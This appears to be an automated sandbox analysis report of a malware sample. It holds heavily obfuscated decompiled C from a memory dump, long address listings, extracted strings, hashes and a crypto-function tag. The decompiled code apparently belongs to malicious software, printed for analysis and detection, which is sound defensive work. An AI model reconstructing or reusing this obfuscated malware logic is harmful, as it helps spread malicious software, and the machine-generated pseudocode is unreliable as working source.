									_t780 = E00A80AD3(_v380, _v232, __eflags);
									 *_t923 = 0xa615c8;
									__eflags = E00A692DD(_t780, _v208, _v88,  &_v84, E00A80AD3(_v184, _v272, __eflags), _v160, _v332, _v112) - _v264;
									_t808 =  ==  ? 0xfce4db5 : 0x3abff5b;
									E00A72EED(_v152, _v224, _v372, _t780);
									E00A72EED(_v192, _v256, _v308, _t781);
									_t923 =  &(_t923[0xb]);
									goto L11;
								} else {
									if(_t808 == 0x88fbe98) {
										E00A6F699(_v300,  *((intOrPtr*)( *0xa85be0 + 8)), _v268, _v96, _v176);
										_t923 =  &(_t923[3]);
										_t808 = _t913;
										goto L1;
									} else {
										if(_t808 == _t761) {
											_push(_t829);
											_t792 = E00A76F53( *((intOrPtr*)( *0xa85be0 + 0xc)));
											_t808 =  !=  ? _t916 : _t913;
											 *((intOrPtr*)( *0xa85be0 + 8)) = _t792;
											while(1) {
												L1:
												_t829 = 0xfce4db5;
												_t761 = 0x8c7d07e;
												_t889 = 0x74c5c61;
												goto L2;
											}
										}
									}
								}
							}
						}
						L25:
						__eflags = _t808 - 0x3abff5b;
					} while (__eflags != 0);
					return _t921;
				}
			}

0x00a7f561
0x00a7f567
0x00a7f580
0x00a7f587
0x00a7f589
0x00a7f594
0x00a7f599
0x00a7f5a4
0x00a7f5ac
0x00a7f5b1
0x00a7f5bf
0x00a7f5c6
0x00a7f5cb
0x00a7f5d1
0x00a7f5d9
0x00a7f5e1
0x00a7f5e6
0x00a7f5ee
0x00a7f5f3
0x00a7f5fb
0x00a7f60e
0x00a7f611
0x00a7f623
0x00a7f62a
0x00a7f635
0x00a7f640
0x00a7f64f
0x00a7f654
0x00a7f65d
0x00a7f668
0x00a7f673
0x00a7f67b
0x00a7f683
0x00a7f68e
0x00a7f6a1
0x00a7f6a2
0x00a7f6a9
0x00a7f6b4
0x00a7f6bf
0x00a7f6ca
0x00a7f6d2
0x00a7f6da
0x00a7f6e5
0x00a7f6f0
0x00a7f6fb
0x00a7f706
0x00a7f711
0x00a7f71c
0x00a7f727
0x00a7f732
0x00a7f73d
0x00a7f748
0x00a7f753
0x00a7f75b
0x00a7f763
0x00a7f768
0x00a7f76d
0x00a7f775
0x00a7f783
0x00a7f787
0x00a7f791
0x00a7f799
0x00a7f7a1
0x00a7f7a9
0x00a7f7b1
0x00a7f7bc
0x00a7f7c1
0x00a7f7c7
0x00a7f7cf
0x00a7f7da
0x00a7f7e9
0x00a7f7ee
0x00a7f7f7
0x00a7f802
0x00a7f80d
0x00a7f814
0x00a7f81f
0x00a7f82a
0x00a7f832
0x00a7f83a
0x00a7f845
0x00a7f850
0x00a7f85b
0x00a7f866
0x00a7f871
0x00a7f878
0x00a7f883
0x00a7f88b
0x00a7f893
0x00a7f89d
0x00a7f89e
0x00a7f8a2
0x00a7f8aa
0x00a7f8b5
0x00a7f8c0
0x00a7f8cb
0x00a7f8d6
0x00a7f8e1
0x00a7f8ec
0x00a7f8f7
0x00a7f907
0x00a7f90e
0x00a7f919
0x00a7f927
0x00a7f930
0x00a7f934
0x00a7f93c
0x00a7f944
0x00a7f94f
0x00a7f95a
0x00a7f962
0x00a7f96d
0x00a7f978
0x00a7f980
0x00a7f98b
0x00a7f996
0x00a7f99e
0x00a7f9a6
0x00a7f9ab
0x00a7f9b3
0x00a7f9bb
0x00a7f9c3
0x00a7f9c8
0x00a7f9d0
0x00a7f9d8
0x00a7f9e0
0x00a7f9ed
0x00a7f9f8
0x00a7fa03
0x00a7fa18
0x00a7fa1b
0x00a7fa22
0x00a7fa2a
0x00a7fa35
0x00a7fa48
0x00a7fa4f
0x00a7fa5a
0x00a7fa62
0x00a7fa67
0x00a7fa6f
0x00a7fa77
0x00a7fa7f
0x00a7fa8a
0x00a7fa95
0x00a7faa0
0x00a7fab3
0x00a7faba
0x00a7fac5
0x00a7facd
0x00a7fad5
0x00a7fadd
0x00a7fae5
0x00a7fafb
0x00a7fb02
0x00a7fb0d
0x00a7fb18
0x00a7fb23
0x00a7fb2b
0x00a7fb36
0x00a7fb41
0x00a7fb53
0x00a7fb58
0x00a7fb61
0x00a7fb6c
0x00a7fb77
0x00a7fb7f
0x00a7fb8a
0x00a7fb95
0x00a7fb9d
0x00a7fba8
0x00a7fbb3
0x00a7fbbe
0x00a7fbc6
0x00a7fbd1
0x00a7fbdc
0x00a7fbe4
0x00a7fbef
0x00a7fbfa
0x00a7fc05
0x00a7fc10
0x00a7fc1b
0x00a7fc26
0x00a7fc31
0x00a7fc39
0x00a7fc41
0x00a7fc4c
0x00a7fc58
0x00a7fc5b
0x00a7fc5f
0x00a7fc64
0x00a7fc6c
0x00a7fc74
0x00a7fc85
0x00a7fc88
0x00a7fc91
0x00a7fc9d
0x00a7fca1
0x00a7fca9
0x00a7fcb1
0x00a7fcb9
0x00a7fcbe
0x00a7fcc6
0x00a7fcce
0x00a7fcd9
0x00a7fce4
0x00a7fcef
0x00a7fcfa
0x00a7fd05
0x00a7fd10
0x00a7fd18
0x00a7fd1d
0x00a7fd2a
0x00a7fd2b
0x00a7fd2f
0x00a7fd37
0x00a7fd3f
0x00a7fd44
0x00a7fd4c
0x00a7fd54
0x00a7fd5c
0x00a7fd67
0x00a7fd72
0x00a7fd7d
0x00a7fd88
0x00a7fd9c
0x00a7fda3
0x00a7fdae
0x00a7fdb9
0x00a7fdc4
0x00a7fdcf
0x00a7fdda
0x00a7fde2
0x00a7fdea
0x00a7fdf7
0x00a7fdfb
0x00a7fe03
0x00a7fe0b
0x00a7fe13
0x00a7fe1b
0x00a7fe23
0x00a7fe2b
0x00a7fe33
0x00a7fe3b
0x00a7fe3f
0x00a7fe47
0x00a7fe4f
0x00a7fe5a
0x00a7fe62
0x00a7fe6d
0x00a7fe7a
0x00a7fe7e
0x00a7fe86
0x00a7fe8e
0x00a7fe96
0x00a7fea1
0x00a7fea9
0x00a7feb4
0x00a7febc
0x00a7fec9
0x00a7fecf
0x00a7fed4
0x00a7fedc
0x00a7fef0
0x00a7fef5
0x00a7fefe
0x00a7ff09
0x00a7ff14
0x00a7ff1f
0x00a7ff2a
0x00a7ff32
0x00a7ff3a
0x00a7ff44
0x00a7ff47
0x00a7ff4b
0x00a7ff53
0x00a7ff5e
0x00a7ff69
0x00a7ff71
0x00a7ff7c
0x00a7ff87
0x00a7ff92
0x00a7ff9d
0x00a7ffa8
0x00a7ffb3
0x00a7ffbe
0x00a7ffc9
0x00a7ffd4
0x00a7ffdc
0x00a7ffe1
0x00a7ffee
0x00a7fff2
0x00a7fffa
0x00a8000d
0x00a8000e
0x00a80015
0x00a80020
0x00a80028
0x00a80035
0x00a8003e
0x00a80042
0x00a8004a
0x00a80052
0x00a8005a
0x00a80062
0x00a8006a
0x00a80072
0x00a8007d
0x00a80085
0x00a80090
0x00a8009b
0x00a800a6
0x00a800ae
0x00a800b9
0x00a800cd
0x00a800d4
0x00a800df
0x00a800ea
0x00a800f5
0x00a80100
0x00a80108
0x00a8010c
0x00a80114
0x00a80119
0x00a80121
0x00a80129
0x00a8012e
0x00a80133
0x00a80138
0x00a8013d
0x00a80142
0x00a8014a
0x00a80155
0x00a80155
0x00a80155
0x00a8015a
0x00a8015f
0x00a80164
0x00a80164
0x00a80164
0x00a80164
0x00a80166
0x00000000
0x00000000
0x00a80411
0x00a80413
0x00a80597
0x00a8059c
0x00a8059f
0x00000000
0x00a80419
0x00a80419
0x00a8041f
0x00a80570
0x00000000
0x00a80425
0x00a80425
0x00a80427
0x00a80438
0x00a80449
0x00a80452
0x00a80459
0x00a8046d
0x00a8047f
0x00a80485
0x00a80494
0x00a804a2
0x00a804ad
0x00a804bb
0x00a804d1
0x00a8052c
0x00a80549
0x00a8054c
0x00a80551
0x00a80564
0x00a802a2
0x00a802a2
0x00a802a7
0x00a802a7
0x00a805a4
0x00a805a4
0x00a805a9
0x00a805ae
0x00a805ae
0x00a80427
0x00a8041f
0x00000000
0x00a80413
0x00a8016c
0x00a8034f
0x00a80354
0x00a80355
0x00a8035e
0x00a80369
0x00a8037b
0x00a803d8
0x00a803dd
0x00a803e0
0x00a803e7
0x00a803f0
0x00a803e9
0x00a803eb
0x00a803ed
0x00a803ed
0x00a80405
0x00000000
0x00a80172
0x00a80174
0x00a802bc
0x00a80315
0x00a8032f
0x00a80332
0x00a80337
0x00000000
0x00a8017a
0x00a80180
0x00a801fc
0x00a80201
0x00a80216
0x00a80262
0x00a8027c
0x00a8027f
0x00a8029a
0x00a8029f
0x00000000
0x00a80182
0x00a80188
0x00a801e2
0x00a801e7
0x00a801ea
0x00000000
0x00a8018a
0x00a8018c
0x00a801a3
0x00a801a7
0x00a801b8
0x00a801bb
0x00a80155
0x00a80155
0x00a80155
0x00a8015a
0x00a8015f
0x00000000
0x00a8015f
0x00a80155
0x00a8018c
0x00a80188
0x00a80180
0x00a80174
0x00a805b3
0x00a805b3
0x00a805b3
0x00a805cb
0x00a805cb

Strings

(, xrefs: 00A7F668
CM<, xrefs: 00A7FBD1
qDC, xrefs: 00A7F75B
@H, xrefs: 00A7F883
,Tj, xrefs: 00A7F96D
TqV, xrefs: 00A7F727
, xrefs: 00A8014A
J-, xrefs: 00A7FFB3
yI, xrefs: 00A7FCD9
R, xrefs: 00A7FA8A
;r, xrefs: 00A800AE
Nu, xrefs: 00A7FD4C
*h, xrefs: 00A7F7A9
1cV, xrefs: 00A80121
M49, xrefs: 00A7F814
~A, xrefs: 00A8005A
4T, xrefs: 00A80100

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: $($*h$,Tj$1cV$4T$;r$@H$CM<$J-$M49$Nu$R$TqV$qDC$yI$~A
API String ID: 0-1702946932
Opcode ID: ee8cc78afeeda9c914c39f195f298e7d2e06a73953d9830244360f349d8293de
Instruction ID: 4b93a8174d38153bf93c1ecdb7058ce99e42d33c49d21393fdb1d96f816db2c7
Opcode Fuzzy Hash: ee8cc78afeeda9c914c39f195f298e7d2e06a73953d9830244360f349d8293de
Instruction Fuzzy Hash: 1D82EF715093809FD3B8CF65C98AB8BBBE1BBC4704F10891DE5DA86260DBB59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00A6C69B, Relevance: 20.7, Strings: 16, Instructions: 715
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E00A6C69B(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				void* _v88;
				intOrPtr _v92;
				intOrPtr* _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				void* _t802;
				void* _t804;
				void* _t806;
				void* _t813;
				void* _t815;
				void* _t824;
				void* _t825;
				void* _t826;
				void* _t834;
				signed int _t840;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				signed int _t859;
				signed int _t860;
				signed int _t861;
				void* _t862;
				char _t876;
				void* _t895;
				void* _t970;
				signed int _t973;
				void* _t974;
				signed int _t976;
				void* _t977;
				void* _t981;
				signed int* _t982;
				void* _t985;

				_t982 =  &_v420;
				_v92 = 0x21aaea;
				_v96 = __ecx;
				asm("stosd");
				_t840 = 0x27;
				asm("stosd");
				_t981 = 0;
				_t834 = 0x28b91dd;
				asm("stosd");
				_v276 = 0xea4201;
				_v276 = _v276 / _t840;
				_v276 = _v276 >> 9;
				_v276 = _v276 ^ 0x00000300;
				_v216 = 0x33fbfd;
				_v216 = _v216 + 0xffff15bd;
				_v216 = _v216 ^ 0x003311ba;
				_v348 = 0x23ac56;
				_t841 = 7;
				_v348 = _v348 * 0x70;
				_v348 = _v348 >> 0xa;
				_v348 = _v348 << 5;
				_v348 = _v348 ^ 0x007cdb20;
				_v152 = 0xc392ed;
				_v152 = _v152 | 0x3cac8e62;
				_v152 = _v152 ^ 0x3cef9eef;
				_v120 = 0xdb52e;
				_v120 = _v120 | 0x021edf72;
				_v120 = _v120 ^ 0x021fff7e;
				_v140 = 0x716289;
				_v140 = _v140 / _t841;
				_v140 = _v140 ^ 0x001032a5;
				_v404 = 0x901eee;
				_v404 = _v404 | 0xb1deeda2;
				_v404 = _v404 << 0x10;
				_t842 = 0x18;
				_v404 = _v404 * 0x76;
				_v404 = _v404 ^ 0xf7b40000;
				_v308 = 0x6641fd;
				_v308 = _v308 << 8;
				_v308 = _v308 >> 0xb;
				_v308 = _v308 ^ 0x000cc83f;
				_v220 = 0xec4b39;
				_t65 =  &_v220; // 0xec4b39
				_v220 =  *_t65 * 0x63;
				_v220 = _v220 ^ 0x5b61170b;
				_v336 = 0x6361c6;
				_v336 = _v336 | 0x3c2b95f6;
				_v336 = _v336 << 6;
				_v336 = _v336 ^ 0xaef3ea0d;
				_v336 = _v336 ^ 0xb40e978d;
				_v196 = 0x15a25f;
				_v196 = _v196 * 0x3e;
				_v196 = _v196 ^ 0x053d5302;
				_v244 = 0xaeb8cf;
				_v244 = _v244 ^ 0x8ffcaaa2;
				_v244 = _v244 + 0xffff121b;
				_v244 = _v244 ^ 0x8f512488;
				_v284 = 0x3cdf2a;
				_v284 = _v284 / _t842;
				_t843 = 0x6f;
				_v284 = _v284 / _t843;
				_v284 = _v284 ^ 0x00028d29;
				_v380 = 0xe8bf5b;
				_v380 = _v380 | 0xa79448e5;
				_v380 = _v380 + 0x3298;
				_t844 = 0x61;
				_v380 = _v380 / _t844;
				_v380 = _v380 ^ 0x01b6f871;
				_v164 = 0xa028e3;
				_v164 = _v164 >> 8;
				_v164 = _v164 ^ 0x000bef7a;
				_v144 = 0xaa000b;
				_v144 = _v144 | 0xb15b5655;
				_v144 = _v144 ^ 0xb1f93ed7;
				_v224 = 0x825ce8;
				_v224 = _v224 ^ 0x99839705;
				_v224 = _v224 ^ 0x990bf034;
				_v232 = 0x9a02a1;
				_v232 = _v232 ^ 0x3230df48;
				_v232 = _v232 ^ 0x32abc77a;
				_v372 = 0xe8db0;
				_v372 = _v372 ^ 0xdf502c0f;
				_v372 = _v372 << 4;
				_v372 = _v372 + 0xa166;
				_v372 = _v372 ^ 0xf5e20524;
				_v236 = 0xf17d89;
				_v236 = _v236 << 0xa;
				_v236 = _v236 ^ 0xc5fdd8cb;
				_v192 = 0x124401;
				_v192 = _v192 << 1;
				_v192 = _v192 ^ 0x002403ab;
				_v200 = 0x5fb430;
				_v200 = _v200 ^ 0xc7981bfe;
				_v200 = _v200 ^ 0xc7ca3d42;
				_v208 = 0xc74c13;
				_t845 = 0x57;
				_v208 = _v208 / _t845;
				_v208 = _v208 ^ 0x0006a8aa;
				_v168 = 0x8380fc;
				_v168 = _v168 * 0x53;
				_v168 = _v168 ^ 0x2aae8785;
				_v176 = 0x9ffdb9;
				_v176 = _v176 ^ 0xfc54cce6;
				_v176 = _v176 ^ 0xfccfce01;
				_v184 = 0x3c19aa;
				_v184 = _v184 + 0xffff0dbd;
				_v184 = _v184 ^ 0x003c7cd6;
				_v332 = 0x7ddf6a;
				_v332 = _v332 * 0x48;
				_v332 = _v332 + 0xffffc784;
				_v332 = _v332 >> 2;
				_v332 = _v332 ^ 0x08d6f5e9;
				_v260 = 0x768b26;
				_v260 = _v260 + 0x1ea0;
				_v260 = _v260 >> 0xa;
				_v260 = _v260 ^ 0x00091d68;
				_v340 = 0xf041ab;
				_v340 = _v340 | 0x9a3ffa69;
				_v340 = _v340 * 0x76;
				_v340 = _v340 << 2;
				_v340 = _v340 ^ 0xc7fb4a22;
				_v356 = 0x43b3d6;
				_v356 = _v356 + 0x4b8b;
				_v356 = _v356 + 0xe9f;
				_v356 = _v356 >> 3;
				_v356 = _v356 ^ 0x000654db;
				_v296 = 0x3744a4;
				_v296 = _v296 | 0xb4c0bda8;
				_v296 = _v296 << 0xc;
				_v296 = _v296 ^ 0x7fd1bf6e;
				_v240 = 0xf0a4a1;
				_t846 = 0x35;
				_t973 = 0x29;
				_v240 = _v240 * 0x29;
				_v240 = _v240 ^ 0x268dfba5;
				_v204 = 0x963c75;
				_v204 = _v204 * 0x65;
				_v204 = _v204 ^ 0x3b49a4c9;
				_v248 = 0xe9b3e2;
				_v248 = _v248 + 0xffffcfe1;
				_v248 = _v248 + 0xffff3918;
				_v248 = _v248 ^ 0x00edd730;
				_v320 = 0x14b129;
				_v320 = _v320 | 0x7afa9cce;
				_v320 = _v320 << 6;
				_v320 = _v320 * 0x2c;
				_v320 = _v320 ^ 0xf22961a1;
				_v412 = 0xf4420e;
				_v412 = _v412 * 0x78;
				_v412 = _v412 >> 5;
				_v412 = _v412 + 0x6896;
				_v412 = _v412 ^ 0x039e325f;
				_v420 = 0x97c268;
				_v420 = _v420 >> 7;
				_v420 = _v420 + 0x9a22;
				_v420 = _v420 * 5;
				_v420 = _v420 ^ 0x0006f3f8;
				_v368 = 0xfa90cd;
				_v368 = _v368 >> 3;
				_v368 = _v368 | 0x960f0bdf;
				_v368 = _v368 / _t846;
				_v368 = _v368 ^ 0x02d25408;
				_v344 = 0xc4a2c6;
				_v344 = _v344 / _t973;
				_t847 = 0x6d;
				_v344 = _v344 * 0x41;
				_v344 = _v344 / _t847;
				_v344 = _v344 ^ 0x0000e167;
				_v376 = 0xa5ec95;
				_v376 = _v376 + 0xffff9374;
				_v376 = _v376 + 0x40c1;
				_v376 = _v376 << 5;
				_v376 = _v376 ^ 0x14ba2e6c;
				_v124 = 0xd2fda4;
				_v124 = _v124 + 0xe683;
				_v124 = _v124 ^ 0x00d1ecea;
				_v188 = 0x3a4eac;
				_v188 = _v188 * 0x65;
				_v188 = _v188 ^ 0x170628e3;
				_v132 = 0x698490;
				_v132 = _v132 + 0x597e;
				_v132 = _v132 ^ 0x0066fb45;
				_v292 = 0x223a77;
				_v292 = _v292 << 0xd;
				_v292 = _v292 + 0xffff3c10;
				_v292 = _v292 ^ 0x474a06e9;
				_v180 = 0x302f0e;
				_v180 = _v180 >> 5;
				_v180 = _v180 ^ 0x000a5e5d;
				_v300 = 0xc22ee2;
				_v300 = _v300 << 9;
				_v300 = _v300 ^ 0x161ea530;
				_v300 = _v300 ^ 0x924eaf38;
				_v172 = 0xfb4aa2;
				_t848 = 0x5b;
				_v172 = _v172 / _t848;
				_v172 = _v172 ^ 0x000048eb;
				_v388 = 0x360efc;
				_t849 = 0xa;
				_v388 = _v388 * 0x3a;
				_v388 = _v388 + 0xc1c4;
				_v388 = _v388 + 0x5664;
				_v388 = _v388 ^ 0x0c403f0e;
				_v396 = 0x5476a;
				_v396 = _v396 ^ 0x42600bf2;
				_v396 = _v396 >> 0xe;
				_v396 = _v396 * 0x62;
				_v396 = _v396 ^ 0x00664365;
				_v328 = 0xe3494b;
				_v328 = _v328 + 0x92aa;
				_v328 = _v328 ^ 0x6aed616f;
				_t376 =  &_v328; // 0x6aed616f
				_v328 =  *_t376 / _t849;
				_v328 = _v328 ^ 0x0a9641d7;
				_v268 = 0xcdefc7;
				_v268 = _v268 ^ 0xa3334e4e;
				_t850 = 0x25;
				_v268 = _v268 / _t850;
				_v268 = _v268 ^ 0x04647efb;
				_v400 = 0x131a5;
				_t851 = 0x64;
				_v400 = _v400 * 0x4a;
				_v400 = _v400 ^ 0x0f1274da;
				_v400 = _v400 * 0x22;
				_v400 = _v400 ^ 0x07d5f55f;
				_v360 = 0xe617d1;
				_v360 = _v360 >> 0xd;
				_v360 = _v360 | 0x5174fa74;
				_v360 = _v360 + 0x188;
				_v360 = _v360 ^ 0x517a384b;
				_v128 = 0xe00f23;
				_v128 = _v128 << 0xa;
				_v128 = _v128 ^ 0x8036c474;
				_v408 = 0xcb78c3;
				_v408 = _v408 / _t851;
				_t852 = 0x47;
				_v408 = _v408 / _t852;
				_v408 = _v408 + 0xffff68fe;
				_v408 = _v408 ^ 0xfff44118;
				_v272 = 0xfc5a62;
				_v272 = _v272 * 0x34;
				_v272 = _v272 >> 5;
				_v272 = _v272 ^ 0x019747a7;
				_v156 = 0xfa4dde;
				_v156 = _v156 >> 8;
				_v156 = _v156 ^ 0x000644ae;
				_v304 = 0x2315e0;
				_v304 = _v304 ^ 0x963b0ec5;
				_t853 = 0x11;
				_v304 = _v304 / _t853;
				_v304 = _v304 ^ 0x08dc5d77;
				_v392 = 0x627a1b;
				_t854 = 0x75;
				_v392 = _v392 / _t854;
				_v392 = _v392 << 0xc;
				_t976 = 0x2a;
				_v392 = _v392 / _t976;
				_v392 = _v392 ^ 0x0054cd8e;
				_v148 = 0x2962f6;
				_v148 = _v148 << 0xe;
				_v148 = _v148 ^ 0x58b06ca9;
				_v212 = 0x9d6abd;
				_v212 = _v212 + 0xffff6fa8;
				_v212 = _v212 ^ 0x009f4a76;
				_v416 = 0xfea0f4;
				_t855 = 0x2d;
				_v416 = _v416 / _t855;
				_v416 = _v416 / _t973;
				_v416 = _v416 + 0x55e0;
				_v416 = _v416 ^ 0x0005c112;
				_v228 = 0x3963a4;
				_v228 = _v228 ^ 0x31d128c3;
				_v228 = _v228 ^ 0x31eeea44;
				_v136 = 0x9230b0;
				_v136 = _v136 + 0xffff1ea6;
				_v136 = _v136 ^ 0x00954d5e;
				_v364 = 0x2249f0;
				_v364 = _v364 ^ 0xfb680cc4;
				_v364 = _v364 / _t976;
				_v364 = _v364 << 4;
				_v364 = _v364 ^ 0x5fb5fcae;
				_v160 = 0x56bde9;
				_v160 = _v160 << 0x10;
				_v160 = _v160 ^ 0xbde8ac4a;
				_v312 = 0x1ceb4a;
				_v312 = _v312 | 0x930b0a1e;
				_v312 = _v312 + 0x4259;
				_v312 = _v312 ^ 0x93207f8d;
				_v280 = 0x43d239;
				_v280 = _v280 >> 0xb;
				_v280 = _v280 + 0xffff7066;
				_v280 = _v280 ^ 0xfff11c5c;
				_v264 = 0xa9b19b;
				_v264 = _v264 + 0xffffea48;
				_v264 = _v264 ^ 0xb4acc61c;
				_v264 = _v264 ^ 0xb407c15c;
				_v288 = 0x20bbe8;
				_v288 = _v288 + 0xffffa4f3;
				_v288 = _v288 + 0xeeb1;
				_v288 = _v288 ^ 0x002a2e89;
				_v384 = 0x678812;
				_t856 = 0x60;
				_v384 = _v384 / _t856;
				_v384 = _v384 ^ 0xc458a46c;
				_t974 = 0x4e52e2;
				_t977 = 0x8c2efc;
				_t857 = 0x74;
				_v384 = _v384 / _t857;
				_v384 = _v384 ^ 0x01b63bee;
				_v256 = 0xedc72;
				_t858 = 0x62;
				_v256 = _v256 / _t858;
				_v256 = _v256 >> 0xf;
				_v256 = _v256 ^ 0x000eb51d;
				_v352 = 0x77af38;
				_v352 = _v352 + 0xffff483b;
				_v352 = _v352 + 0xdbd8;
				_v352 = _v352 + 0xffff9e40;
				_v352 = _v352 ^ 0x007a82c2;
				_v316 = 0x34e014;
				_v316 = _v316 >> 0xb;
				_v316 = _v316 + 0xffff226a;
				_v316 = _v316 ^ 0x55756368;
				_v316 = _v316 ^ 0xaa84562e;
				_v324 = 0x2bc11f;
				_v324 = _v324 | 0x52ab72b8;
				_t859 = 0x58;
				_v324 = _v324 / _t859;
				_t860 = 0x5f;
				_v324 = _v324 / _t860;
				_v324 = _v324 ^ 0x00016621;
				_v252 = 0xf022e;
				_v252 = _v252 >> 8;
				_t861 = 0x3b;
				_v252 = _v252 / _t861;
				_v252 = _v252 ^ 0x000f04ac;
				while(1) {
					L1:
					_t802 = 0xd56de6a;
					while(1) {
						L2:
						_t862 = 0x80f0eae;
						do {
							while(1) {
								L3:
								_t985 = _t834 - 0x8ccb677;
								if(_t985 > 0) {
									break;
								}
								if(_t985 == 0) {
									E00A78907(_v100, _v280, _v264, _v288);
									_t834 = _t974;
									while(1) {
										L1:
										_t802 = 0xd56de6a;
										L2:
										_t862 = 0x80f0eae;
										goto L3;
									}
								}
								if(_t834 == _t974) {
									E00A78907(_v116, _v384, _v256, _v352);
									_t834 = 0xe9f0a5a;
									while(1) {
										L1:
										_t802 = 0xd56de6a;
										goto L2;
									}
								}
								if(_t834 == _t977) {
									_t824 = E00A7F561(_v104);
									_t834 = 0xac30134;
									__eflags = _t824;
									_t981 =  !=  ? 1 : _t981;
									while(1) {
										L1:
										_t802 = 0xd56de6a;
										goto L2;
									}
								}
								if(_t834 == 0x14ed6fb) {
									_t825 = E00A7132D(_v116, _v296, _v240, _v120, _v204);
									_t982 =  &(_t982[3]);
									__eflags = _t825 - _v140;
									_t802 = 0xd56de6a;
									_t834 =  ==  ? 0xd56de6a : _t974;
									goto L2;
								}
								if(_t834 == 0x15fae28) {
									_t826 = E00A80AD3(_v328, _v268, __eflags);
									_t895 = 0xa61598;
									__eflags = E00A6F7F4(_v400, _t826, _v360,  *_v96,  *((intOrPtr*)(_v96 + 4)), _t895, _v128, _v112,  &_v100, _v408, _v272, _v220, _v156, _v304) - _v336;
									_t834 =  ==  ? 0x80f0eae : _t974;
									E00A72EED(_v392, _v148, _v212, _t826);
									_t982 =  &(_t982[0xe]);
									L14:
									_t977 = 0x8c2efc;
									L35:
									_t862 = 0x80f0eae;
									_t802 = 0xd56de6a;
									goto L36;
								}
								if(_t834 == 0x28b91dd) {
									_t834 = 0xbb5c550;
									continue;
								}
								if(_t834 != _t862) {
									goto L36;
								}
								E00A73927(_v416, _v228, _v136, _v196,  &_v104, _v116, _v100);
								_t982 =  &(_t982[5]);
								_t834 =  ==  ? _t977 : 0x8ccb677;
								while(1) {
									L1:
									_t802 = 0xd56de6a;
									goto L2;
								}
							}
							__eflags = _t834 - 0x9b49f28;
							if(_t834 == 0x9b49f28) {
								_v108 = 0x100;
								_t804 = E00A7703F(_v332, _v260, _v340, 0x100,  &_v116, _v112, _v348, _v356);
								_t982 =  &(_t982[6]);
								__eflags = _t804 - _v152;
								if(__eflags != 0) {
									_t834 = 0xe9f0a5a;
									goto L35;
								}
								_t834 = 0x14ed6fb;
								while(1) {
									L1:
									_t802 = 0xd56de6a;
									goto L2;
								}
							}
							__eflags = _t834 - 0xac30134;
							if(_t834 == 0xac30134) {
								E00A65FF7(_v364, _v160, _v312, _v104);
								_t834 = 0x8ccb677;
								goto L1;
							}
							__eflags = _t834 - 0xbb5c550;
							if(__eflags == 0) {
								_push(0xa616d8);
								_t806 = E00A80AD3(_v284, _v380, __eflags);
								 *_t982 = 0xa615c8;
								__eflags = E00A692DD(_t806, _v276, _v224,  &_v112, E00A80AD3(_v164, _v144, __eflags), _v232, _v372, _v236) - _v216;
								_t834 =  ==  ? 0x9b49f28 : 0x911112e;
								E00A72EED(_v192, _v200, _v208, _t806);
								E00A72EED(_v168, _v176, _v184, _t807);
								_t982 =  &(_t982[0xa]);
								_t974 = 0x4e52e2;
								goto L14;
							}
							__eflags = _t834 - _t802;
							if(__eflags == 0) {
								_push(0xa61598);
								_t813 = E00A80AD3(_v248, _v320, __eflags);
								_t876 = 0x48;
								_t980 = _t813;
								_v108 = _t876;
								_t815 = E00A6AD17( &_v108, _v404, _t876, _v412,  &_v76, _v420, _t876, _v116, _v368, _v344, _v376, _t813, _v124, _v188);
								_t982 =  &(_t982[0xc]);
								__eflags = _t815 - _v308;
								if(_t815 != _v308) {
									_t834 = _t974;
								} else {
									_push(_v300);
									_push(_v180);
									_push(_v292);
									_push(_v132);
									_push( *0xa85be0 + 0x18);
									_t970 = 0x40;
									E00A74626( &_v68, _t970);
									_t982 =  &(_t982[5]);
									_t834 = 0x15fae28;
								}
								E00A72EED(_v172, _v388, _v396, _t980);
								goto L14;
							}
							__eflags = _t834 - 0xe9f0a5a;
							if(_t834 != 0xe9f0a5a) {
								goto L36;
							}
							E00A62CF9(_v316, _v324, _v244, _v252, _v112);
							L25:
							return _t981;
							L36:
							__eflags = _t834 - 0x911112e;
						} while (__eflags != 0);
						goto L25;
					}
				}
			}

0x00a6c69b
0x00a6c6a1
0x00a6c6b9
0x00a6c6c0
0x00a6c6c5
0x00a6c6c8
0x00a6c6c9
0x00a6c6cb
0x00a6c6d0
0x00a6c6d1
0x00a6c6e7
0x00a6c6ee
0x00a6c6f6
0x00a6c701
0x00a6c70c
0x00a6c717
0x00a6c722
0x00a6c72f
0x00a6c732
0x00a6c736
0x00a6c73b
0x00a6c740
0x00a6c748
0x00a6c753
0x00a6c75e
0x00a6c769
0x00a6c774
0x00a6c77f
0x00a6c78a
0x00a6c7a0
0x00a6c7a7
0x00a6c7b2
